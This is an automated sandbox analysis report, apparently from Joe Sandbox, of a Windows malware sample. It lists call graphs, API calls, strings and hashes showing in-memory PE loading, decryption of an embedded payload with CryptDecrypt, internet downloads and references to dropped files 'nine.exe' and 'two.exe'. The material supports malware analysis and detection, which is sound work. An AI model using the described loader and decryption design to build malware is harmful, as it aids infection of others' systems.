43391->43392 43391->43395 43400 411401 14 API calls __dosmaperr 43392->43400 43394 41970e GetLastError 43394->43395 43395->43383 43396->43375 43397->43381 43398->43382 43400->43394 43401->43170 43402->43179 43403->43188 43407 419075 43404->43407 43410 419089 43407->43410 43408 41908d 43424 401e98 InternetOpenA 43408->43424 43426 411401 14 API calls __dosmaperr 43408->43426 43410->43408 43412 4190c7 43410->43412 43410->43424 43411 4190b7 43427 411327 25 API calls ___std_exception_copy 43411->43427 43428 411431 37 API calls 2 library calls 43412->43428 43415 4190d3 43416 4190dd 43415->43416 43420 4190f4 43415->43420 43429 421f0d 25 API calls 2 library calls 43416->43429 43418 419176 43418->43424 43430 411401 14 API calls __dosmaperr 43418->43430 43419 4191cb 43419->43424 43432 411401 14 API calls __dosmaperr 43419->43432 43420->43418 43420->43419 43423 4191bf 43431 411327 25 API calls ___std_exception_copy 43423->43431 43424->43198 43426->43411 43427->43424 43428->43415 43429->43424 43430->43423 43431->43424 43432->43424 43433->43211 43434->43214 43435->43207 43436->43237 43437->43240 43438->43233 43439->43247 43440->43249 43441->43251 43442->43258 43443->43260 43444->43253 43445->43268 43447 40b763 43446->43447 43448 40b8f0 43447->43448 43449 40b830 43447->43449 43453 40b768 _Yarn 43447->43453 43465 401660 27 API calls 43448->43465 43454 40b865 43449->43454 43455 40b88b 43449->43455 43451 40b8f5 43466 4015c0 27 API calls 3 library calls 43451->43466 43453->43272 43454->43451 43457 40b870 43454->43457 43462 40b87d _Yarn 43455->43462 43464 4015c0 27 API calls 5 library calls 43455->43464 43456 40b876 43459 411337 25 API calls 43456->43459 43456->43462 43463 4015c0 27 API calls 5 library calls 43457->43463 43461 40b8ff 43459->43461 43462->43272 43463->43456 43464->43462 43466->43456 43467->43113 43468->43114 43469->43113 43470->43118 43472 414c39 43471->43472 43473 414c4b 43471->43473 43499 40d906 GetModuleHandleW 43472->43499 43483 414ad2 43473->43483 43477 414c3e 43477->43473 43500 414cd1 GetModuleHandleExW 43477->43500 43478 40d66b 43478->42629 43482 414c8e 43484 414ade ___scrt_is_nonwritable_in_current_image 43483->43484 43506 414fa9 EnterCriticalSection 43484->43506 43486 414ae8 43507 414b3e 43486->43507 43488 414af5 43511 414b13 43488->43511 43491 414c8f 43516 41b919 GetPEB 43491->43516 43494 414cbe 43497 414cd1 CallUnexpected 3 API calls 43494->43497 43495 414c9e GetPEB 43495->43494 43496 414cae GetCurrentProcess TerminateProcess 43495->43496 43496->43494 43498 414cc6 ExitProcess 43497->43498 43499->43477 43501 414cf0 GetProcAddress 43500->43501 43502 414d13 43500->43502 43503 414d05 43501->43503 43504 414c4a 43502->43504 43505 414d19 FreeLibrary 43502->43505 43503->43502 43504->43473 43505->43504 43506->43486 43508 414b4a ___scrt_is_nonwritable_in_current_image 43507->43508 43509 414bab CallUnexpected 43508->43509 43514 416f1d 14 API calls CallUnexpected 43508->43514 43509->43488 43515 414ff1 LeaveCriticalSection 43511->43515 43513 414b01 43513->43478 43513->43491 43514->43509 43515->43513 43517 41b933 43516->43517 43518 414c99 43516->43518 43520 419a42 5 API calls std::_Locinfo::_Locinfo_dtor 43517->43520 43518->43494 43518->43495 43520->43518 43521 413388 43522 4196e8 _free 14 API calls 43521->43522 43523 4133a0 43522->43523 43524 217003c 43525 2170049 43524->43525 43539 2170e0f SetErrorMode SetErrorMode 43525->43539 43530 2170265 43531 21702ce VirtualProtect 43530->43531 43533 217030b 43531->43533 43532 2170439 VirtualFree 43537 21705f4 LoadLibraryA 43532->43537 43538 21704be 43532->43538 43533->43532 43534 21704e3 LoadLibraryA 43534->43538 43536 21708c7 43537->43536 43538->43534 43538->43537 43540 2170223 43539->43540 43541 2170d90 43540->43541 43542 2170dad 43541->43542 43543 2170238 VirtualAlloc 43542->43543 43544 2170dbb GetPEB 43542->43544 43543->43530 43544->43543 43545 100079ee 43546 10007a2c 43545->43546 43547 100079fc __dosmaperr 43545->43547 43553 10005926 12 API calls __dosmaperr 43546->43553 43547->43546 43549 10007a17 RtlAllocateHeap 43547->43549 43552 10005aed EnterCriticalSection LeaveCriticalSection __dosmaperr 43547->43552 43549->43547 43550 10007a2a 43549->43550 43552->43547 43553->43550

                                                              Executed Functions

                                                              Function 00402C60 Relevance: 40.8, APIs: 11, Strings: 12, Instructions: 504COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 402c60-402c82 1 402c84-402cab SetLastError call 402910 call 40cd83 0->1 2 402cac-402cb4 0->2 4 402ce1-402cef 2->4 5 402cb6 2->5 8 402cf1-402d18 SetLastError call 402910 call 40cd83 4->8 9 402d19-402d26 4->9 7 402cbb-402ce0 call 402910 SetLastError call 40cd83 5->7 11 402d28-402d2d 9->11 12 402d2f-402d38 9->12 11->7 16 402d44-402d4a 12->16 17 402d3a-402d3f 12->17 20 402d56-402d63 16->20 21 402d4c-402d51 16->21 17->7 25 402d84-402da7 GetNativeSystemInfo 20->25 26 402d65 20->26 21->7 29 402db3-402dcb VirtualAlloc 25->29 30 402da9-402dae 25->30 28 402d67-402d82 26->28 28->25 28->28 31 402df3-402e0e GetProcessHeap HeapAlloc 29->31 32 402dcd-402ddd VirtualAlloc 29->32 30->7 33 402e10-402e1d VirtualFree 31->33 34 402e24-402e6a 31->34 32->31 35 402ddf-402dec call 402910 32->35 33->34 36 402e6c-402e6e SetLastError 34->36 37 402e8e-402ed6 VirtualAlloc call 40e400 34->37 35->31 40 402e74-402e8d call 4033c0 call 40cd83 36->40 45 402edc-402edf 37->45 46 402f8f-402f98 37->46 47 402ee0-402ee5 45->47 48 40301d 46->48 49 402f9e-402fa5 46->49 51 402ee7-402ef3 47->51 52 402f28-402f30 47->52 56 403022-40302e call 402a70 48->56 53 402fa7-402fa9 49->53 54 402fab-402fbd 49->54 58 402f74-402f86 51->58 59 402ef5-402f0f 51->59 52->36 61 402f36-402f49 call 402be0 52->61 53->56 54->48 60 402fbf 54->60 56->40 65 403034-403057 56->65 58->47 63 402f8c 58->63 59->40 72 402f15-402f26 call 40ea40 59->72 64 402fc0-402fd5 60->64 69 402f4b-402f50 61->69 63->46 67 402fd7-402fda 64->67 68 40300e-403018 64->68 70 403059-40305e 65->70 71 40306c-40308c 65->71 73 402fe0-402ff1 67->73 68->64 75 40301a 68->75 69->40 74 402f56-402f6b call 40e400 69->74 76 403060-403063 70->76 77 403065-403067 70->77 79 403092-403098 71->79 80 403155-403161 call 402940 71->80 89 402f6e-402f71 72->89 81 402ff3-402ffb 73->81 82 402ffe-40300c 73->82 74->89 75->48 76->71 77->71 84 403069 77->84 86 4030a0-4030b9 79->86 92 403166-403168 80->92 81->82 82->68 82->73 84->71 90 4030d3-4030d6 86->90 91 4030bb-4030be 86->91 89->58 93 403113-40311f 90->93 94 4030d8-4030df 90->94 95 4030c0-4030c3 91->95 96 4030c5-4030c8 91->96 92->40 97 40316e-40317a 92->97 100 403121 93->100 101 403127-403130 93->101 98 403110 94->98 99 4030e1-4030e6 call 402940 94->99 102 4030cd-4030d0 95->102 96->90 103 4030ca 96->103 104 4031a3-4031a8 97->104 105 40317c-403185 97->105 98->93 112 4030eb-4030ed 99->112 100->101 109 403133-40314f 101->109 102->90 103->102 107 4031fa-403213 call 40cd83 104->107 108 4031aa-4031b3 104->108 105->104 110 403187-40318b 105->110 114 4031e4-4031f9 call 40cd83 108->114 115 4031b5-4031be 108->115 109->80 109->86 110->104 111 40318d 110->111 117 403190-40319f 111->117 112->40 118 4030f3-40310e 112->118 123 4031c0 115->123 124 4031ca-4031e3 call 40cd83 115->124 125 4031a1 117->125 118->109 123->124 125->104
                                                              APIs
                                                              • SetLastError.KERNEL32(0000000D), ref: 00402C86
                                                              • SetLastError.KERNEL32(000000C1), ref: 00402CC8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: ,@$ ,@$@$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$P,@0,@ ,@$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                              • API String ID: 1452528299-90842840
                                                              • Opcode ID: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                              • Instruction ID: d1ae0cd5652749efb72fafdd6d36f3c4f1fa47aae7819869a3385d061891a2f5
                                                              • Opcode Fuzzy Hash: a8622f64d8070585d512a72ec777aab289d6801d447c326e6b8095fd7aed850a
                                                              • Instruction Fuzzy Hash: E112AB71A012059BDB14CFA9D984BAEB7B5BF48304F14417AE809BB3C5D7B8ED41CB98
                                                              Function 004034B0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 232encryptionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 810 4034b0-403538 CryptAcquireContextW 811 4035fa-403610 GetLastError CryptReleaseContext 810->811 812 40353e-40355c CryptCreateHash 810->812 813 403744-40374a 811->813 812->811 814 403562-403575 812->814 815 403774-403791 call 40cd83 813->815 816 40374c-403758 813->816 817 403578-40357d 814->817 818 40376a-403771 call 40cfc3 816->818 819 40375a-403768 816->819 817->817 820 40357f-4035c6 call 40cfd1 call 41366b CryptHashData 817->820 818->815 819->818 822 403792-4037d0 call 411337 call 40e131 819->822 834 4035d6-4035f8 CryptDeriveKey 820->834 835 4035c8-4035d1 GetLastError 820->835 834->811 836 403615-403616 call 4133dd 834->836 835->813 838 40361b-403667 call 40e400 call 40cfd1 836->838 843 403738-40373e CryptDestroyKey 838->843 844 40366d-40367c 838->844 843->813 845 403682-40368b 844->845 846 403699-4036d4 call 40e400 CryptDecrypt 845->846 847 40368d-40368f 845->847 846->843 850 4036d6-403701 call 40e400 846->850 847->846 850->843 853 403703-403732 850->853 853->843 853->845
                                                              APIs
                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,A1833436), ref: 00403530
                                                              • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403554
                                                              • _mbstowcs.LIBCMT ref: 004035A7
                                                              • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035BE
                                                              • GetLastError.KERNEL32 ref: 004035C8
                                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004035F0
                                                              • GetLastError.KERNEL32 ref: 004035FA
                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040360A
                                                              • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036CC
                                                              • CryptDestroyKey.ADVAPI32(?), ref: 0040373E
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004037BE
                                                              Strings
                                                              • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040350C, 004037A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                              • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                              • API String ID: 4265767208-63410773
                                                              • Opcode ID: 7b998e777f9dba12feb14bf4fe2aca7bea4611c124f2976cea3106fcf7bfb3b9
                                                              • Instruction ID: 95a2a36aee1ec4de7b2520a7f89bd3df41077e598d0595e4efdc36d1890455ca
                                                              • Opcode Fuzzy Hash: 7b998e777f9dba12feb14bf4fe2aca7bea4611c124f2976cea3106fcf7bfb3b9
                                                              • Instruction Fuzzy Hash: 898193B1A00218AFEB208F25CC45B9EBBB9EF45310F4081BAF54DE7291DB359E858F55
                                                              Function 00408E60 Relevance: 19.9, APIs: 5, Strings: 6, Instructions: 601COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 904 408e60-408ec3 905 408ec6-408ecb 904->905 905->905 906 408ecd-408f5f call 402460 call 40ea40 call 409fc0 call 40b9b0 905->906 915 408f61-408f74 906->915 916 408fb3-408fd0 906->916 919 408f86-408f8d call 40b220 915->919 920 408f76-408f84 call 40a850 915->920 917 408fd6-409007 GetModuleFileNameA 916->917 918 4093fe-409401 916->918 922 409011-409016 917->922 923 409407-40942d 918->923 924 40956b-40959b call 40a850 * 2 call 4063d0 918->924 927 408f92-408fb1 call 40b9b0 919->927 920->927 922->922 929 409018-40905c call 402460 call 402640 922->929 930 409477-40947e 923->930 931 40942f-409443 call 40d10c 923->931 960 4095cc-409659 call 409bf0 call 40c763 call 40a580 924->960 961 40959d-4095ac 924->961 927->915 927->916 954 409062-409089 929->954 955 4091e7-409210 call 402640 929->955 934 409480-4094a5 930->934 935 4094aa-4094cd 930->935 931->930 943 409445-409474 call 40d41e call 40d0c2 931->943 934->935 940 4094d0-4094d5 935->940 940->940 944 4094d7-4094f6 call 402460 940->944 943->930 958 4094f8-40951c 944->958 959 40951e-40953a call 40b040 944->959 962 4090d2-4090d9 954->962 963 40908b-40909f call 40d10c 954->963 979 409216-40923d 955->979 980 40936f-4093b9 call 402460 * 2 call 4063d0 955->980 958->924 959->924 981 40953c-40954b 959->981 1024 409686-4096a2 call 40cd83 960->1024 1025 40965b-40966a 960->1025 971 4095c2-4095c9 call 40cfc3 961->971 972 4095ae-4095bc 961->972 968 409113-409139 962->968 969 4090db-40910e 962->969 963->962 982 4090a1-4090cf call 40d41e call 40d0c2 963->982 978 409140-409145 968->978 969->968 971->960 972->971 973 4096aa-4096ee call 411337 972->973 1012 4096f0-4096f2 973->1012 1013 4096f4-4096fb 973->1013 978->978 987 409147-409166 call 402460 978->987 988 409286-40928d 979->988 989 40923f-409253 call 40d10c 979->989 1032 4093be 980->1032 990 409561-409568 call 40cfc3 981->990 991 40954d-40955b 981->991 982->962 1015 409191-4091ad call 40b040 987->1015 1016 409168-40918c 987->1016 994 4092c7-4092ed 988->994 995 40928f-4092c2 988->995 989->988 1017 409255-409283 call 40d41e call 40d0c2 989->1017 990->924 991->973 991->990 1003 4092f0-4092f5 994->1003 995->994 1003->1003 1011 4092f7-409316 call 402460 1003->1011 1011->1016 1043 40931c-409338 call 40b040 1011->1043 1019 409705-40971c 1012->1019 1013->1019 1020 4096fd-409700 1013->1020 1026 4093c1-4093ca 1015->1026 1041 4091b3-4091c2 1015->1041 1016->1026 1017->988 1034 4097a2-4097a8 1019->1034 1035 409722 1019->1035 1020->1019 1031 409702 1020->1031 1037 40967c-409683 call 40cfc3 1025->1037 1038 40966c-40967a 1025->1038 1026->924 1036 4093d0-4093df 1026->1036 1031->1019 1032->1026 1042 4097af-4097cd 1034->1042 1044 409724-409726 1035->1044 1045 409728-409731 1035->1045 1036->990 1046 4093e5-4093f3 1036->1046 1037->1024 1038->973 1038->1037 1049 4091c4-4091d2 1041->1049 1050 4091d8-4091e2 call 40cfc3 1041->1050 1043->1026 1069 40933e-40934d 1043->1069 1044->1034 1044->1045 1054 409733-409736 1045->1054 1055 409748-409751 1045->1055 1052 4096a5 call 411337 1046->1052 1053 4093f9 1046->1053 1049->1050 1049->1052 1050->1026 1052->973 1053->990 1062 409738-40973d 1054->1062 1063 40973f-409742 1054->1063 1057 409753-409758 1055->1057 1058 40976d-409770 1055->1058 1057->1058 1065 40975a-40976a 1057->1065 1066 409772-409774 1058->1066 1067 409797-4097a0 1058->1067 1062->1034 1062->1063 1063->1055 1064 409744-409746 1063->1064 1064->1034 1064->1055 1065->1058 1066->1067 1070 409776-409795 1066->1070 1067->1042 1071 409363-40936d call 40cfc3 1069->1071 1072 40934f-40935d 1069->1072 1070->1067 1071->1026 1072->1052 1072->1071
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00408FE4
                                                              • __Init_thread_footer.LIBCMT ref: 0040927E
                                                              • __Init_thread_footer.LIBCMT ref: 004090CA
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              • __Init_thread_footer.LIBCMT ref: 0040946F
                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040963D
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Init_thread_footer$EnterLeave$ConditionFileIos_base_dtorModuleNameVariableWakestd::ios_base::_
                                                              • String ID: GET$NOSUB$ZYA.$kc~z$nine.exe$two.exe
                                                              • API String ID: 2716318523-155817423
                                                              • Opcode ID: c88f92c882b648590cba2f2499e70da6b29ef9d5d5b97d2e5ff23a0a3304e30a
                                                              • Instruction ID: b8017e68b8cd19ffbf6244ec68e5bce9a373ae63186eb1a6feb7d55068310508
                                                              • Opcode Fuzzy Hash: c88f92c882b648590cba2f2499e70da6b29ef9d5d5b97d2e5ff23a0a3304e30a
                                                              • Instruction Fuzzy Hash: 0942F5719103049BDB14DF28DD89BAAB7B1BB49304F1042EEE449673D2DB79AE84CF49
                                                              Function 00402940 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1095 402940-402957 1096 402999-4029ad call 40cd83 1095->1096 1097 402959-402962 1095->1097 1098 402964-402969 1097->1098 1099 4029ae-4029f0 VirtualProtect 1097->1099 1098->1096 1103 40296b-402970 1098->1103 1099->1096 1102 4029f2-402a14 GetLastError FormatMessageA 1099->1102 1104 402a17-402a1c 1102->1104 1105 402972-40297a 1103->1105 1106 402986-402993 call 402c00 1103->1106 1104->1104 1107 402a1e-402a6a LocalAlloc call 4028d0 OutputDebugStringA LocalFree * 2 call 40cd83 1104->1107 1105->1106 1108 40297c-402984 1105->1108 1111 402995 1106->1111 1108->1106 1110 402998 1108->1110 1110->1096 1111->1110
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 004029E8
                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 004029FD
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A0B
                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A26
                                                              • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A45
                                                              • LocalFree.KERNEL32(00000000), ref: 00402A52
                                                              • LocalFree.KERNEL32(?), ref: 00402A57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                              • String ID: %s: %s$Error protecting memory page
                                                              • API String ID: 839691724-1484484497
                                                              • Opcode ID: 5db2cce3fd63739b711254987153777c537def3ef7a5a6feb85d6925e6d193cb
                                                              • Instruction ID: e8b4d11ea5ec4951a28bd1c843c991d4af80b6875fe3e076a8189f470f5303fb
                                                              • Opcode Fuzzy Hash: 5db2cce3fd63739b711254987153777c537def3ef7a5a6feb85d6925e6d193cb
                                                              • Instruction Fuzzy Hash: 333103B2B01104AFDB109F68DC44F6EB7A8EF44710F4541BEE905EB2D1DB75AD068B88
                                                              Function 00401840 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298networkfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1200 401840-401903 InternetSetFilePointer InternetReadFile 1202 40193d-401980 call 40ea40 HttpQueryInfoA 1200->1202 1206 401ce5-401d13 call 40cd83 1202->1206 1207 401986-4019b9 CoCreateInstance 1202->1207 1207->1206 1209 4019bf-4019c6 1207->1209 1209->1206 1211 4019cc-4019fa 1209->1211 1212 401a00-401a05 1211->1212 1212->1212 1213 401a07-401ac8 call 402460 MultiByteToWideChar call 40cfd1 MultiByteToWideChar 1212->1213 1218 401ad0-401ad9 1213->1218 1218->1218 1219 401adb-401b99 call 402300 call 40cd91 1218->1219 1226 401bca-401bcc 1219->1226 1227 401b9b-401baa 1219->1227 1230 401bd2-401bd9 1226->1230 1231 401cd9-401ce0 1226->1231 1228 401bc0-401bc7 call 40cfc3 1227->1228 1229 401bac-401bba 1227->1229 1228->1226 1229->1228 1232 401d16-401d1b call 411337 1229->1232 1230->1231 1234 401bdf-401c53 call 40cfd1 1230->1234 1231->1206 1241 401c55-401c63 1234->1241 1242 401cbf-401cd5 call 40cd91 1234->1242 1243 401c65-401c9b call 40cfd1 call 401470 call 40cd91 1241->1243 1244 401c9d 1241->1244 1242->1231 1247 401ca0-401cbc call 401470 1243->1247 1244->1247 1247->1242
                                                              APIs
                                                              • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004018C5
                                                              • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004018E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileInternet$PointerRead
                                                              • String ID: text
                                                              • API String ID: 3197321146-999008199
                                                              • Opcode ID: d39032ca1dc0b9f69d1bb390edc8543737ea8d5becb6f7b64ce9485d89a3947a
                                                              • Instruction ID: 48e4c645a74c51e6b7fa04efd3e880018ef5ff171affb454254e0df7a66f96b1
                                                              • Opcode Fuzzy Hash: d39032ca1dc0b9f69d1bb390edc8543737ea8d5becb6f7b64ce9485d89a3947a
                                                              • Instruction Fuzzy Hash: 22C17C70A002189FEB25CF24CD85BEAB7B5FF48304F1041ADE409A72A1DB75AE85CF54
                                                              Function 00414C8F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1451 414c8f-414c9c call 41b919 1454 414cbe-414cca call 414cd1 ExitProcess 1451->1454 1455 414c9e-414cac GetPEB 1451->1455 1455->1454 1456 414cae-414cb8 GetCurrentProcess TerminateProcess 1455->1456 1456->1454
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00414C8E,00000000,74DEDF80,?,00000000,?,004190D3), ref: 00414CB1
                                                              • TerminateProcess.KERNEL32(00000000,?,00414C8E,00000000,74DEDF80,?,00000000,?,004190D3), ref: 00414CB8
                                                              • ExitProcess.KERNEL32 ref: 00414CCA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                              • Instruction ID: 5ca820ed295d6e044a5f1fab1df988cbd5672b183a1e8dae9fa6470a94bd119c
                                                              • Opcode Fuzzy Hash: 5d3814fd653fb94eda293752331a35f9eef9a20fec4b4b7a3dbf7aca3d0aeaad
                                                              • Instruction Fuzzy Hash: A6E04631102118AFCB216B14CD09AAD3B69EB80791B410429F80486231DF39DDA3DEC8
                                                              Function 007AB146 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1459 7ab146-7ab15f 1460 7ab161-7ab163 1459->1460 1461 7ab16a-7ab176 CreateToolhelp32Snapshot 1460->1461 1462 7ab165 1460->1462 1463 7ab178-7ab17e 1461->1463 1464 7ab186-7ab193 Module32First 1461->1464 1462->1461 1463->1464 1469 7ab180-7ab184 1463->1469 1465 7ab19c-7ab1a4 1464->1465 1466 7ab195-7ab196 call 7aae05 1464->1466 1470 7ab19b 1466->1470 1469->1460 1469->1464 1470->1465
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007AB16E
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 007AB18E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7aa000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: c73ff3ed973c005196f71be9ae59e7ce169e02ac168c089932e2b371a4d3f32c
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 2AF06231200714BFD7203AF5D89DA6B76F8BF8A725F100628F646910C1DB74E8458662
                                                              Function 004063D0 Relevance: 27.4, APIs: 5, Strings: 10, Instructions: 1101sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 4063d0-406477 call 414f0a call 414dc4 Sleep call 402460 call 4046d0 138 4064a1-4064e2 call 402460 call 4046d0 129->138 139 406479-406485 129->139 152 406511-406518 138->152 153 4064e4-4064f0 138->153 140 406497-40649e call 40cfc3 139->140 141 406487-406495 139->141 140->138 141->140 143 406502 call 411337 141->143 149 406507-40650e call 40cfc3 143->149 149->152 155 406526-40652c 152->155 156 40651a-406524 152->156 153->149 157 4064f2-406500 153->157 158 40652f-406531 155->158 156->158 157->143 157->149 159 406533-40653b 158->159 160 40655a-406587 call 404450 call 40b430 158->160 161 406540-406558 call 414eda 159->161 168 4068b7-4068fe call 40a830 * 3 call 407310 call 40a460 call 4022c0 call 40a620 call 4021f0 160->168 169 40658d-406626 call 40ea40 call 40cfd1 call 40ea40 160->169 161->160 216 4069d1-4069fc call 4075b0 call 40a420 call 4022c0 call 40a620 call 4021f0 168->216 217 406904-406915 call 402170 168->217 182 406628-40663c call 40d10c 169->182 183 40666a-406671 169->183 182->183 193 40663e-406667 call 40d41e call 40d0c2 182->193 185 406673-406698 183->185 186 40669d-4066be 183->186 185->186 189 4066c0-4066c5 186->189 189->189 192 4066c7-40673f call 402460 call 40b900 189->192 208 406741-40674d 192->208 209 40676e-406786 192->209 193->183 212 406764-40676b call 40cfc3 208->212 213 40674f-40675d 208->213 210 406790-4067ad 209->210 214 4067c2-4067c9 call 401d20 210->214 215 4067af-4067b8 call 40cd91 210->215 212->209 213->212 218 40675f call 411337 213->218 227 4067ce-4067d0 214->227 215->214 269 406ad0-406afb call 407950 call 40a420 call 4022c0 call 40a620 call 4021f0 216->269 270 406a02-406a79 call 407630 call 40a420 call 4022c0 call 402240 call 4021f0 call 4076b0 call 40a440 call 4022c0 call 402240 call 4021f0 call 407730 call 40a480 call 4022c0 call 40a620 call 4021f0 216->270 232 406974-4069cc call 4074a0 call 40a480 call 4022c0 call 402240 call 4021f0 call 407530 call 40a440 call 4022c0 call 402240 call 4021f0 call 40a800 217->232 233 406917-40696f call 407390 call 40a480 call 4022c0 call 402240 call 4021f0 call 407420 call 40a440 call 4022c0 call 402240 call 4021f0 call 40a800 217->233 218->212 230 406865-40686c Sleep 227->230 231 4067d6-4067fc 227->231 230->210 235 406800-406805 231->235 348 406f49-406f4b 232->348 233->348 235->235 240 406807-40682c call 402460 